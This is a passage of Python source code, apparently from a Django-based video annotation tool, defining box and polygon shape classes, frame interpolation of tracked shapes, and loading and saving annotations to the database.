self.xbr = (self.xbr + box.xbr) / 2
self.ybr = (self.ybr + box.ybr) / 2
def add_attribute(self, attr):
self.attributes.append(attr)
class _LabeledBox(_BoundingBox):
def __init__(self, label, x0, y0, x1, y1, frame, group_id, occluded, z_order, client_id=None, attributes=None):
super().__init__(x0, y0, x1, y1, frame, occluded, z_order, client_id, attributes)
self.label = label
self.group_id = group_id
class _TrackedBox(_BoundingBox):
def __init__(self, x0, y0, x1, y1, frame, occluded, z_order, outside, attributes=None):
super().__init__(x0, y0, x1, y1, frame, occluded, z_order, None, attributes)
self.outside = outside
class _InterpolatedBox(_TrackedBox):
def __init__(self, x0, y0, x1, y1, frame, occluded, z_order, outside, keyframe, attributes=None):
super().__init__(x0, y0, x1, y1, frame, occluded, z_order, outside, attributes)
self.keyframe = keyframe
class _PolyShape:
def __init__(self, points, frame, occluded, z_order, client_id=None, attributes=None):
self.points = points
self.frame = frame
self.occluded = occluded
self.z_order = z_order
self.client_id=client_id
self.attributes = attributes if attributes else []
def add_attribute(self, attr):
self.attributes.append(attr)
class _LabeledPolyShape(_PolyShape):
def __init__(self, label, points, frame, group_id, occluded, z_order, client_id=None, attributes=None):
super().__init__(points, frame, occluded, z_order, client_id, attributes)
self.label = label
self.group_id = group_id
class _TrackedPolyShape(_PolyShape):
def __init__(self, points, frame, occluded, z_order, outside, attributes=None):
super().__init__(points, frame, occluded, z_order, None, attributes)
self.outside = outside
class _InterpolatedPolyShape(_TrackedPolyShape):
def __init__(self, points, frame, occluded, z_order, outside, keyframe, attributes=None):
super().__init__(points, frame, occluded, z_order, outside, attributes)
self.keyframe = keyframe
class _BoxPath:
def __init__(self, label, start_frame, stop_frame, group_id, boxes=None, client_id=None, attributes=None):
self.label = label
self.frame = start_frame
self.stop_frame = stop_frame
self.group_id = group_id
self.boxes = boxes if boxes else []
self.client_id = client_id
self.attributes = attributes if attributes else []
self._interpolated_boxes = []
assert not self.boxes or self.boxes[-1].frame <= self.stop_frame
def add_box(self, box):
self.boxes.append(box)
def get_interpolated_boxes(self):
if not self._interpolated_boxes:
self._init_interpolated_boxes()
return self._interpolated_boxes
def _init_interpolated_boxes(self):
assert self.boxes[-1].frame <= self.stop_frame
boxes = []
stop_box = copy.copy(self.boxes[-1])
stop_box.frame = self.stop_frame + 1
attributes = {}
for box0, box1 in zip(self.boxes, self.boxes[1:] + [stop_box]):
assert box0.frame < box1.frame
distance = float(box1.frame - box0.frame)
delta_xtl = (box1.xtl - box0.xtl) / distance
delta_ytl = (box1.ytl - box0.ytl) / distance
delta_xbr = (box1.xbr - box0.xbr) / distance
delta_ybr = (box1.ybr - box0.ybr) / distance
# New box doesn't have all attributes (only first one does).
# Thus it is necessary to propagate them.
for attr in box0.attributes:
attributes[attr.id] = attr
for frame in range(box0.frame, box1.frame):
off = frame - box0.frame
xtl = box0.xtl + delta_xtl * off
ytl = box0.ytl + delta_ytl * off
xbr = box0.xbr + delta_xbr * off
ybr = box0.ybr + delta_ybr * off
box = _InterpolatedBox(xtl, ytl, xbr, ybr, frame, box0.occluded, box0.z_order,
box0.outside, box0.frame == frame, list(attributes.values()))
boxes.append(box)
if box0.outside:
break
self._interpolated_boxes = boxes
def merge(self, path):
assert self.label.id == path.label.id
boxes = {box.frame:box for box in self.boxes}
for box in path.boxes:
if box.frame in boxes:
boxes[box.frame].merge(box)
else:
boxes[box.frame] = box
self.frame = min(self.frame, path.frame)
self.stop_frame = max(self.stop_frame, path.stop_frame)
self.boxes = list(sorted(boxes.values(), key=lambda box: box.frame))
self._interpolated_boxes = []
def add_attribute(self, attr):
self.attributes.append(attr)
class _PolyPath:
def __init__(self, label, start_frame, stop_frame, group_id, shapes=None, client_id=None, attributes=None):
self.label = label
self.frame = start_frame
self.stop_frame = stop_frame
self.group_id = group_id
self.shapes = shapes if shapes else []
self.client_id = client_id
self.attributes = attributes if attributes else []
self._interpolated_shapes = [] # ???
def add_shape(self, shape):
self.shapes.append(shape)
def get_interpolated_shapes(self):
if not self._interpolated_shapes:
self._init_interpolated_shapes()
return self._interpolated_shapes
def _init_interpolated_shapes(self):
assert self.shapes[-1].frame <= self.stop_frame
self._interpolated_shapes = []
shapes = {shape.frame: shape for shape in self.shapes}
outside = False
attributes = {}
for frame in range(self.frame, self.stop_frame + 1):
if frame in shapes:
for attr in shapes[frame].attributes:
attributes[attr.id] = attr
shape = _InterpolatedPolyShape(shapes[frame].points, frame,
shapes[frame].occluded, shapes[frame].z_order, shapes[frame].outside, True, list(attributes.values()))
outside = shape.outside
self._interpolated_shapes.append(shape)
elif not outside:
shape = _InterpolatedPolyShape(self._interpolated_shapes[-1].points, frame, False,
0, True, True, list(attributes.values()))
outside = shape.outside
self._interpolated_shapes.append(shape)
def merge(self, path):
pass
def add_attribute(self, attr):
self.attributes.append(attr)
class _Annotation:
def __init__(self, start_frame, stop_frame):
self.start_frame = start_frame
self.stop_frame = stop_frame
self.reset()
def reset(self):
self.boxes = []
self.box_paths = []
self.polygons = []
self.polygon_paths = []
self.polylines = []
self.polyline_paths = []
self.points = []
self.points_paths = []
def has_data(self):
non_empty = False
for attr in ['boxes', 'box_paths', 'polygons', 'polygon_paths',
'polylines', 'polyline_paths', 'points', 'points_paths']:
non_empty |= bool(getattr(self, attr))
return non_empty
# Functions below used by dump functionality
def to_boxes(self):
boxes = []
for path in self.box_paths:
for box in path.get_interpolated_boxes():
if not box.outside:
box = _LabeledBox(
label=path.label,
x0=box.xtl, y0=box.ytl, x1=box.xbr, y1=box.ybr,
frame=box.frame,
group_id=path.group_id,
occluded=box.occluded,
z_order=box.z_order,
attributes=box.attributes + path.attributes,
)
boxes.append(box)
return self.boxes + boxes
def _to_poly_shapes(self, iter_attr_name):
shapes = []
for path in getattr(self, iter_attr_name):
for shape in path.get_interpolated_shapes():
if not shape.outside:
shape = _LabeledPolyShape(
label=path.label,
points=shape.points,
frame=shape.frame,
group_id=path.group_id,
occluded=shape.occluded,
z_order=shape.z_order,
attributes=shape.attributes + path.attributes,
)
shapes.append(shape)
return shapes
def to_polygons(self):
polygons = self._to_poly_shapes('polygon_paths')
return polygons + self.polygons
def to_polylines(self):
polylines = self._to_poly_shapes('polyline_paths')
return polylines + self.polylines
def to_points(self):
points = self._to_poly_shapes('points_paths')
return points + self.points
def to_box_paths(self):
paths = []
for box in self.boxes:
box0 = _InterpolatedBox(box.xtl, box.ytl, box.xbr, box.ybr, box.frame,
box.occluded, box.z_order, False, True)
box1 = copy.copy(box0)
box1.outside = True
box1.frame += 1
path = _BoxPath(
label=box.label,
start_frame=box.frame,
stop_frame=box.frame + 1,
group_id=box.group_id,
boxes=[box0, box1],
attributes=box.attributes,
client_id=box.client_id,
)
paths.append(path)
return self.box_paths + paths
def _to_poly_paths(self, iter_attr_name):
paths = []
for shape in getattr(self, iter_attr_name):
shape0 = _InterpolatedPolyShape(shape.points, shape.frame, shape.occluded, shape.z_order, False, True)
shape1 = copy.copy(shape0)
shape1.outside = True
shape1.frame += 1
path = _PolyPath(
label=shape.label,
start_frame=shape.frame,
stop_frame=shape.frame + 1,
group_id=shape.group_id,
shapes=[shape0, shape1],
client_id=shape.client_id,
attributes=shape.attributes,
)
paths.append(path)
return paths
def to_polygon_paths(self):
return self._to_poly_paths('polygons') + self.polygon_paths
def to_polyline_paths(self):
return self._to_poly_paths('polylines') + self.polyline_paths
def to_points_paths(self):
return self._to_poly_paths('points') + self.points_paths
def bulk_create(db_model, objects, flt_param = {}):
if objects:
if flt_param:
if 'postgresql' in settings.DATABASES["default"]["ENGINE"]:
return db_model.objects.bulk_create(objects)
else:
ids = list(db_model.objects.filter(**flt_param).values_list('id', flat=True))
db_model.objects.bulk_create(objects)
return list(db_model.objects.exclude(id__in=ids).filter(**flt_param))
else:
return db_model.objects.bulk_create(objects)
class _AnnotationForJob(_Annotation):
def __init__(self, db_job):
db_segment = db_job.segment
super().__init__(db_segment.start_frame, db_segment.stop_frame)
# pylint: disable=bad-continuation
self.db_job = db_job
self.logger = slogger.job[db_job.id]
self.db_labels = {db_label.id:db_label
for db_label in db_job.segment.task.label_set.all()}
self.db_attributes = {db_attr.id:db_attr
for db_attr in models.AttributeSpec.objects.filter(
label__task__id=db_job.segment.task.id)}
def _get_client_ids_from_db(self):
client_ids = set()
ids = list(self.db_job.objectpath_set.values_list('client_id', flat=True))
client_ids.update(ids)
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
ids = list(self._get_shape_class(shape_type).objects.filter(
job_id=self.db_job.id).values_list('client_id', flat=True))
client_ids.update(ids)
return client_ids
def _merge_table_rows(self, rows, keys_for_merge, field_id):
"""dot.notation access to dictionary attributes"""
class dotdict(OrderedDict):
__getattr__ = OrderedDict.get
__setattr__ = OrderedDict.__setitem__
__delattr__ = OrderedDict.__delitem__
__eq__ = lambda self, other: self.id == other.id
__hash__ = lambda self: self.id
# It is necessary to keep a stable order of original rows
# (e.g. for tracked boxes). Otherwise prev_box.frame can be bigger
# than next_box.frame.
merged_rows = OrderedDict()
# Group all rows by field_id. In grouped rows replace fields in
# accordance with keys_for_merge structure.
for row in rows:
row_id = row[field_id]
if not row_id in merged_rows:
merged_rows[row_id] = dotdict(row)
for key in keys_for_merge:
merged_rows[row_id][key] = []
for key in keys_for_merge:
item = dotdict({v.split('__', 1)[-1]:row[v] for v in keys_for_merge[key]})
if item.id:
merged_rows[row_id][key].append(item)
# Remove redundant keys from final objects
redundant_keys = [item for values in keys_for_merge.values() for item in values]
for i in merged_rows:
for j in redundant_keys:
del merged_rows[i][j]
return list(merged_rows.values())
@staticmethod
def _clamp(value, min_value, max_value):
return max(min(value, max_value), min_value)
def _clamp_box(self, xtl, ytl, xbr, ybr, im_size):
xtl = self._clamp(xtl, 0, im_size['width'])
xbr = self._clamp(xbr, 0, im_size['width'])
ytl = self._clamp(ytl, 0, im_size['height'])
ybr = self._clamp(ybr, 0, im_size['height'])
return xtl, ytl, xbr, ybr
def _clamp_poly(self, points, im_size):
verified = []
points = points.split(' ')
for p in points:
p = p.split(',')
verified.append('{},{}'.format(
self._clamp(float(p[0]), 0, im_size['width']),
self._clamp(float(p[1]), 0, im_size['height'])
))
return ' '.join(verified)
def init_from_db(self):
def get_values(shape_type):
if shape_type == 'polygons':
return [
('id', 'frame', 'points', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledpolygonattributeval__value', 'labeledpolygonattributeval__spec_id',
'labeledpolygonattributeval__id'), {
'attributes': [
'labeledpolygonattributeval__value',
'labeledpolygonattributeval__spec_id',
'labeledpolygonattributeval__id'
]
}, 'labeledpolygonattributeval_set'
]
elif shape_type == 'polylines':
return [
('id', 'frame', 'points', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledpolylineattributeval__value', 'labeledpolylineattributeval__spec_id',
'labeledpolylineattributeval__id'), {
'attributes': [
'labeledpolylineattributeval__value',
'labeledpolylineattributeval__spec_id',
'labeledpolylineattributeval__id'
]
}, 'labeledpolylineattributeval_set'
]
elif shape_type == 'boxes':
return [
('id', 'frame', 'xtl', 'ytl', 'xbr', 'ybr', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledboxattributeval__value', 'labeledboxattributeval__spec_id',
'labeledboxattributeval__id'), {
'attributes': [
'labeledboxattributeval__value',
'labeledboxattributeval__spec_id',
'labeledboxattributeval__id'
]
}, 'labeledboxattributeval_set'
]
elif shape_type == 'points':
return [
('id', 'frame', 'points', 'label_id', 'group_id', 'occluded', 'z_order', 'client_id',
'labeledpointsattributeval__value', 'labeledpointsattributeval__spec_id',
'labeledpointsattributeval__id'), {
'attributes': [
'labeledpointsattributeval__value',
'labeledpointsattributeval__spec_id',
'labeledpointsattributeval__id'
]
}, 'labeledpointsattributeval_set'
]
self.reset()
for shape_type in ['boxes', 'points', 'polygons', 'polylines']:
(values, merge_keys, prefetch) = get_values(shape_type)
db_shapes = list(self._get_shape_set(shape_type).prefetch_related(prefetch).
values(*values).order_by('frame'))
db_shapes = self._merge_table_rows(db_shapes, merge_keys, 'id')
for db_shape in db_shapes:
label = _Label(self.db_labels[db_shape.label_id])
if shape_type == 'boxes':
shape = _LabeledBox(label=label,
x0=db_shape.xtl, y0=db_shape.ytl, x1=db_shape.xbr, y1=db_shape.ybr,
frame=db_shape.frame,
group_id=db_shape.group_id,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
client_id=db_shape.client_id,
)
else:
shape = _LabeledPolyShape(
label=label,
points=db_shape.points,
frame=db_shape.frame,
group_id=db_shape.group_id,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
client_id=db_shape.client_id,
)
for db_attr in db_shape.attributes:
if db_attr.id != None:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
shape.add_attribute(attr)
getattr(self, shape_type).append(shape)
db_paths = self.db_job.objectpath_set
for shape in ['trackedpoints_set', 'trackedbox_set', 'trackedpolyline_set', 'trackedpolygon_set']:
db_paths.prefetch_related(shape)
for shape_attr in ['trackedpoints_set__trackedpointsattributeval_set', 'trackedbox_set__trackedboxattributeval_set',
'trackedpolygon_set__trackedpolygonattributeval_set', 'trackedpolyline_set__trackedpolylineattributeval_set']:
db_paths.prefetch_related(shape_attr)
db_paths.prefetch_related('objectpathattributeval_set')
db_paths = list (db_paths.values('id', 'frame', 'group_id', 'shapes', 'client_id', 'objectpathattributeval__spec_id',
'objectpathattributeval__id', 'objectpathattributeval__value',
'trackedbox', 'trackedpolygon', 'trackedpolyline', 'trackedpoints',
'trackedbox__id', 'label_id', 'trackedbox__xtl', 'trackedbox__ytl',
'trackedbox__xbr', 'trackedbox__ybr', 'trackedbox__frame', 'trackedbox__occluded',
'trackedbox__z_order','trackedbox__outside', 'trackedbox__trackedboxattributeval__spec_id',
'trackedbox__trackedboxattributeval__value', 'trackedbox__trackedboxattributeval__id',
'trackedpolygon__id' ,'trackedpolygon__points', 'trackedpolygon__frame', 'trackedpolygon__occluded',
'trackedpolygon__z_order', 'trackedpolygon__outside', 'trackedpolygon__trackedpolygonattributeval__spec_id',
'trackedpolygon__trackedpolygonattributeval__value', 'trackedpolygon__trackedpolygonattributeval__id',
'trackedpolyline__id', 'trackedpolyline__points', 'trackedpolyline__frame', 'trackedpolyline__occluded',
'trackedpolyline__z_order', 'trackedpolyline__outside', 'trackedpolyline__trackedpolylineattributeval__spec_id',
'trackedpolyline__trackedpolylineattributeval__value', 'trackedpolyline__trackedpolylineattributeval__id',
'trackedpoints__id', 'trackedpoints__points', 'trackedpoints__frame', 'trackedpoints__occluded',
'trackedpoints__z_order', 'trackedpoints__outside', 'trackedpoints__trackedpointsattributeval__spec_id',
'trackedpoints__trackedpointsattributeval__value', 'trackedpoints__trackedpointsattributeval__id')
.order_by('id', 'trackedbox__frame', 'trackedpolygon__frame', 'trackedpolyline__frame', 'trackedpoints__frame'))
db_box_paths = list(filter(lambda path: path['shapes'] == 'boxes', db_paths ))
db_polygon_paths = list(filter(lambda path: path['shapes'] == 'polygons', db_paths ))
db_polyline_paths = list(filter(lambda path: path['shapes'] == 'polylines', db_paths ))
db_points_paths = list(filter(lambda path: path['shapes'] == 'points', db_paths ))
object_path_attr_merge_key = [
'objectpathattributeval__value',
'objectpathattributeval__spec_id',
'objectpathattributeval__id'
]
db_box_paths = self._merge_table_rows(db_box_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedbox__id', 'trackedbox__xtl', 'trackedbox__ytl',
'trackedbox__xbr', 'trackedbox__ybr', 'trackedbox__frame',
'trackedbox__occluded', 'trackedbox__z_order', 'trackedbox__outside',
'trackedbox__trackedboxattributeval__value',
'trackedbox__trackedboxattributeval__spec_id',
'trackedbox__trackedboxattributeval__id'
],
}, 'id')
db_polygon_paths = self._merge_table_rows(db_polygon_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedpolygon__id', 'trackedpolygon__points', 'trackedpolygon__frame',
'trackedpolygon__occluded', 'trackedpolygon__z_order', 'trackedpolygon__outside',
'trackedpolygon__trackedpolygonattributeval__value',
'trackedpolygon__trackedpolygonattributeval__spec_id',
'trackedpolygon__trackedpolygonattributeval__id'
]
}, 'id')
db_polyline_paths = self._merge_table_rows(db_polyline_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedpolyline__id', 'trackedpolyline__points', 'trackedpolyline__frame',
'trackedpolyline__occluded', 'trackedpolyline__z_order', 'trackedpolyline__outside',
'trackedpolyline__trackedpolylineattributeval__value',
'trackedpolyline__trackedpolylineattributeval__spec_id',
'trackedpolyline__trackedpolylineattributeval__id'
],
}, 'id')
db_points_paths = self._merge_table_rows(db_points_paths, {
'attributes': object_path_attr_merge_key,
'shapes': [
'trackedpoints__id', 'trackedpoints__points', 'trackedpoints__frame',
'trackedpoints__occluded', 'trackedpoints__z_order', 'trackedpoints__outside',
'trackedpoints__trackedpointsattributeval__value',
'trackedpoints__trackedpointsattributeval__spec_id',
'trackedpoints__trackedpointsattributeval__id'
]
}, 'id')
for db_box_path in db_box_paths:
db_box_path.attributes = list(set(db_box_path.attributes))
db_box_path.shapes = self._merge_table_rows(db_box_path.shapes, {
'attributes': [
'trackedboxattributeval__value',
'trackedboxattributeval__spec_id',
'trackedboxattributeval__id'
]
}, 'id')
for db_polygon_path in db_polygon_paths:
db_polygon_path.attributes = list(set(db_polygon_path.attributes))
db_polygon_path.shapes = self._merge_table_rows(db_polygon_path.shapes, {
'attributes': [
'trackedpolygonattributeval__value',
'trackedpolygonattributeval__spec_id',
'trackedpolygonattributeval__id'
]
}, 'id')
for db_polyline_path in db_polyline_paths:
db_polyline_path.attributes = list(set(db_polyline_path.attributes))
db_polyline_path.shapes = self._merge_table_rows(db_polyline_path.shapes, {
'attributes': [
'trackedpolylineattributeval__value',
'trackedpolylineattributeval__spec_id',
'trackedpolylineattributeval__id'
]
}, 'id')
for db_points_path in db_points_paths:
db_points_path.attributes = list(set(db_points_path.attributes))
db_points_path.shapes = self._merge_table_rows(db_points_path.shapes, {
'attributes': [
'trackedpointsattributeval__value',
'trackedpointsattributeval__spec_id',
'trackedpointsattributeval__id'
]
}, 'id')
for db_path in db_box_paths:
for db_shape in db_path.shapes:
db_shape.attributes = list(set(db_shape.attributes))
label = _Label(self.db_labels[db_path.label_id])
path = _BoxPath(
label=label,
start_frame=db_path.frame,
stop_frame=self.stop_frame,
group_id=db_path.group_id,
client_id=db_path.client_id,
)
for db_attr in db_path.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
path.add_attribute(attr)
frame = -1
for db_shape in db_path.shapes:
box = _TrackedBox(
x0=db_shape.xtl, y0=db_shape.ytl, x1=db_shape.xbr, y1=db_shape.ybr,
frame=db_shape.frame,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
outside=db_shape.outside,
)
assert box.frame > frame
frame = box.frame
for db_attr in db_shape.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
box.add_attribute(attr)
path.add_box(box)
self.box_paths.append(path)
for idx, paths_type in enumerate(['polygon_paths', 'polyline_paths', 'points_paths']):
source = [db_polygon_paths, db_polyline_paths, db_points_paths][idx]
for db_path in source:
for db_shape in db_path.shapes:
db_shape.attributes = list(set(db_shape.attributes))
label = _Label(self.db_labels[db_path.label_id])
path = _PolyPath(
label=label,
start_frame=db_path.frame,
stop_frame= self.stop_frame,
group_id=db_path.group_id,
client_id=db_path.client_id,
)
for db_attr in db_path.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
path.add_attribute(attr)
frame = -1
for db_shape in db_path.shapes:
shape = _TrackedPolyShape(
points=db_shape.points,
frame=db_shape.frame,
occluded=db_shape.occluded,
z_order=db_shape.z_order,
outside=db_shape.outside,
)
assert shape.frame > frame
frame = shape.frame
for db_attr in db_shape.attributes:
spec = self.db_attributes[db_attr.spec_id]
attr = _Attribute(spec, db_attr.value)
shape.add_attribute(attr)
path.add_shape(shape)
getattr(self, paths_type).append(path)
def init_from_client(self, data):
# All fields inside data should be converted to correct type explicitly.
# We cannot trust that client will send 23 as integer. Here we also
# accept "23".
db_task = self.db_job.segment.task
image_meta = get_image_meta_cache(db_task)
self.reset()
for box in data['boxes']:
label = _Label(self.db_labels[int(box['label_id'])])
frame_idx = int(box['frame']) if db_task.mode == 'annotation' else 0
xtl, ytl, xbr, ybr = self._clamp_box(float(box['xtl']), float(box['ytl']),
float(box['xbr']), float(box['ybr']),
image_meta['original_size'][frame_idx])
labeled_box = _LabeledBox(
label=label,
x0=xtl, y0=ytl, x1=xbr, y1=ybr,
frame=int(box['frame']),
group_id=int(box['group_id']),
occluded=strtobool(str(box['occluded'])),
z_order=int(box['z_order']),
client_id=int(box['id']),
)
for attr in box['attributes']:
spec = self.db_attributes[int(attr['id'])]
attr = _Attribute(spec, str(attr['value']))
labeled_box.add_attribute(attr)
self.boxes.append(labeled_box)
for poly_shape_type in ['points', 'polygons', 'polylines']:
for poly_shape in data[poly_shape_type]:
label = _Label(self.db_labels[int(poly_shape['label_id'])])
frame_idx = int(poly_shape['frame']) if db_task.mode == 'annotation' else 0
points = self._clamp_poly(poly_shape['points'], image_meta['original_size'][frame_idx])
labeled_poly_shape = _LabeledPolyShape(
label=label,
points=points,
frame=int(poly_shape['frame']),
group_id=int(poly_shape['group_id']),
occluded=poly_shape['occluded'],
z_order=int(poly_shape['z_order']),
client_id=int(poly_shape['id']),
)
for attr in poly_shape['attributes']:
spec = self.db_attributes[int(attr['id'])]
attr = _Attribute(spec, str(attr['value']))
labeled_poly_shape.add_attribute(attr)
getattr(self, poly_shape_type).append(labeled_poly_shape)
for path in data['box_paths']:
label = _Label(self.db_labels[int(path['label_id'])])
boxes = []
frame = -1
has_boxes_on_prev_segm = False
last_box_on_prev_segm = None
has_box_on_start_frame = False
for box in path['shapes']:
if int(box['frame']) < self.start_frame:
has_boxes_on_prev_segm = True
if last_box_on_prev_segm is None or int(last_box_on_prev_segm["frame"]) < int(box["frame"]):
last_box_on_prev_segm = box
elif int(box['frame']) == self.start_frame:
has_box_on_start_frame = True
break
if has_boxes_on_prev_segm and not has_box_on_start_frame:
last_box_on_prev_segm["frame"] = self.start_frame
for box in path['shapes']:
if int(box['frame']) <= self.stop_frame and int(box['frame']) >= self.start_frame:
frame_idx = int(box['frame']) if db_task.mode == 'annotation' else 0
xtl, ytl, xbr, ybr = self._clamp_box(float(box['xtl']), float(box['ytl']),
float(box['xbr']), float(box['ybr']), image_meta['original_size'][frame_idx])
tracked_box = _TrackedBox(
x0=xtl, y0=ytl, x1=xbr, y1=ybr,
frame=int(box['frame']),
occluded=strtobool(str(box['occluded'])),
z_order=int(box['z_order']),
outside=strtobool(str(box['outside'])),
)
assert tracked_box.frame > frame
frame = tracked_box.frame
for attr in box['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
tracked_box.add_attribute(attr)
boxes.append(tracked_box)
else:
self.logger.error("init_from_client: ignore frame #%d " +
"because it out of segment range [%d-%d]", int(box['frame']), self.start_frame, self.stop_frame)
attributes = []
for attr in path['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert not spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
attributes.append(attr)
assert frame <= self.stop_frame
box_path = _BoxPath(label=label,
start_frame=min(list(map(lambda box: box.frame, boxes))),
stop_frame=self.stop_frame,
group_id=int(path['group_id']),
boxes=boxes,
client_id=int(path['id']),
attributes=attributes,
)
self.box_paths.append(box_path)
for poly_path_type in ['points_paths', 'polygon_paths', 'polyline_paths']:
for path in data[poly_path_type]:
label = _Label(self.db_labels[int(path['label_id'])])
poly_shapes = []
frame = -1
has_shapes_on_prev_segm = False
last_shape_on_prev_segm = None
has_shape_on_start_frame = False
for poly_shape in path['shapes']:
if int(poly_shape['frame']) < self.start_frame:
has_shapes_on_prev_segm = True
if last_shape_on_prev_segm is None or int(last_shape_on_prev_segm["frame"]) < (poly_shape["frame"]):
last_shape_on_prev_segm = box
elif int(poly_shape['frame']) == self.start_frame:
has_shape_on_start_frame = True
break
if has_shapes_on_prev_segm and not has_shape_on_start_frame:
last_shape_on_prev_segm["frame"] = self.start_frame
for poly_shape in path['shapes']:
if int(poly_shape['frame']) <= self.stop_frame and int(poly_shape['frame']) >= self.start_frame:
frame_idx = int(poly_shape['frame']) if db_task.mode == 'annotation' else 0
points = self._clamp_poly(poly_shape['points'], image_meta['original_size'][frame_idx])
tracked_poly_shape = _TrackedPolyShape(
points=points,
frame=int(poly_shape['frame']),
occluded=strtobool(str(poly_shape['occluded'])),
z_order=int(poly_shape['z_order']),
outside=strtobool(str(poly_shape['outside'])),
)
assert tracked_poly_shape.frame > frame
frame = tracked_poly_shape.frame
for attr in poly_shape['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
tracked_poly_shape.add_attribute(attr)
poly_shapes.append(tracked_poly_shape)
else:
self.logger.error("init_from_client: ignore frame #%d " +
"because it out of segment range [%d-%d]", int(poly_shape['frame']), self.start_frame, self.stop_frame)
attributes = []
for attr in path['attributes']:
spec = self.db_attributes[int(attr['id'])]
assert not spec.is_mutable()
attr = _Attribute(spec, str(attr['value']))
attributes.append(attr)
poly_path = _PolyPath(
label=label,
start_frame=min(list(map(lambda shape: shape.frame, poly_shapes))),
stop_frame=self.stop_frame + 1,
group_id=int(path['group_id']),
shapes=poly_shapes,
client_id=int(path['id']),
attributes=attributes,
)
getattr(self, poly_path_type).append(poly_path)
return self.has_data()
def _get_shape_class(self, shape_type):
if shape_type == 'polygons':
return models.LabeledPolygon
elif shape_type == 'polylines':
return models.LabeledPolyline
elif shape_type == 'boxes':
return models.LabeledBox
elif shape_type == 'points':
return models.LabeledPoints
elif shape_type == 'polygon_paths':
return models.TrackedPolygon
elif shape_type == 'polyline_paths':
return models.TrackedPolyline
elif shape_type == 'box_paths':
return models.TrackedBox
elif shape_type == 'points_paths':
return models.TrackedPoints
def _get_shape_attr_class(self, shape_type):
if shape_type == 'polygons':
return models.LabeledPolygonAttributeVal
elif shape_type == 'polylines':
return models.LabeledPolylineAttributeVal
elif shape_type == 'boxes':
return models.LabeledBoxAttributeVal
elif shape_type == 'points':
return models.LabeledPointsAttributeVal
elif shape_type == 'polygon_paths':
return models.TrackedPolygonAttributeVal
elif shape_type == 'polyline_paths':
return models.TrackedPolylineAttributeVal
elif shape_type == 'box_paths':
return models.TrackedBoxAttributeVal
elif shape_type == 'points_paths':
return models.TrackedPointsAttributeVal
def _save_paths_to_db(self):
for shape_type in ['polygon_paths', 'polyline_paths', 'points_paths', 'box_paths']:
db_paths = []
db_path_attrvals = []
db_shapes = []
db_shape_attrvals = []
shapes = getattr(self, shape_type)
for path in shapes:
db_path = models.ObjectPath()
db_path.job = self.db_job
db_path.label = self.db_labels[path.label.id]
db_path.frame = path.frame
db_path.group_id = path.group_id
db_path.client_id = path.client_id
if shape_type == 'polygon_paths':
db_path.shapes = 'polygons'
elif shape_type == 'polyline_paths':
db_path.shapes = 'polylines'
elif shape_type == 'box_paths':
db_path.shapes = 'boxes'
elif shape_type == 'points_paths':
db_path.shapes = 'points'
for attr in path.attributes:
db_attrspec = self.db_attributes[attr.id]
db_attrval = models.ObjectPathAttributeVal()
db_attrval.track_id = len(db_paths)
db_attrval.spec = db_attrspec
db_attrval.value = attr.value
db_path_attrvals.append(db_attrval)
path_shapes = path.boxes if hasattr(path, 'boxes') else path.shapes
for shape in path_shapes:
db_shape = self._get_shape_class(shape_type)()
db_shape.track_id = len(db_paths)
if shape_type == 'box_paths':
db_shape.xtl = shape.xtl
db_shape.ytl = shape.ytl
db_shape.xbr = shape.xbr
db_shape.ybr = shape.ybr
else:
db_shape.points = shape.points
db_shape.frame = shape.frame
db_shape.occluded = shape.occluded
db_shape.z_order = shape.z_order
db_shape.outside = shape.outside
for attr in shape.attributes:
db_attrspec = self.db_attributes[attr.id]
db_attrval = self._get_shape_attr_class(shape_type)()
if shape_type == 'polygon_paths':
db_attrval.polygon_id = len(db_shapes)
elif shape_type == 'polyline_paths':
db_attrval.polyline_id = len(db_shapes)
elif shape_type == 'box_paths':
db_attrval.box_id = len(db_shapes)
elif shape_type == 'points_paths':
db_attrval.points_id = len(db_shapes)
db_attrval.spec = db_attrspec
db_attrval.value = attr.value
db_shape_attrvals.append(db_attrval)
db_shapes.append(db_shape)
db_paths.append(db_path)
db_paths = bulk_create(models.ObjectPath, db_paths,
{"job_id": self.db_job.id})
for db_attrval in db_path_attrvals:
db_attrval.track_id = db_paths[db_attrval.track_id].id
bulk_create(models.ObjectPathAttributeVal, db_path_attrvals)
for db_shape in db_shapes:
db_shape.track_id = db_paths[db_shape.track_id].id
db_shapes = bulk_create(self._get_shape_class(shape_type), db_shapes,
{"track__job_id": self.db_job.id})
for db_attrval in db_shape_attrvals:
if shape_type == 'polygon_paths':
db_attrval.polygon_id = db_shapes[db_attrval.polygon_id].id
elif shape_type == 'polyline_paths':
db_attrval.polyline_id = db_shapes[db_attrval.polyline_id].id
elif shape_type == 'box_paths':
db_attrval.box_id = db_shapes[db_attrval.box_id].id
elif shape_type == 'points_paths':
db_attrval.points_id = db_shapes[db_attrval.points_id].id
bulk_create(self._get_shape_attr_class(shape_type), db_shape_attrvals)
def _get_shape_set(self, shape_type):
if shape_type == 'polygons':
return self.db_job.labeledpolygon_set
elif shape_type == 'polylines':
return self.db_job.labeledpolyline_set
elif shape_type == 'boxes':
return self.db_job.labeledbox_set
elif shape_type == 'points':
return self.db_job.labeledpoints_set
def _save_shapes_to_db(self):
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
db_shapes = []
db_attrvals = []
shapes = getattr(self, shape_type)
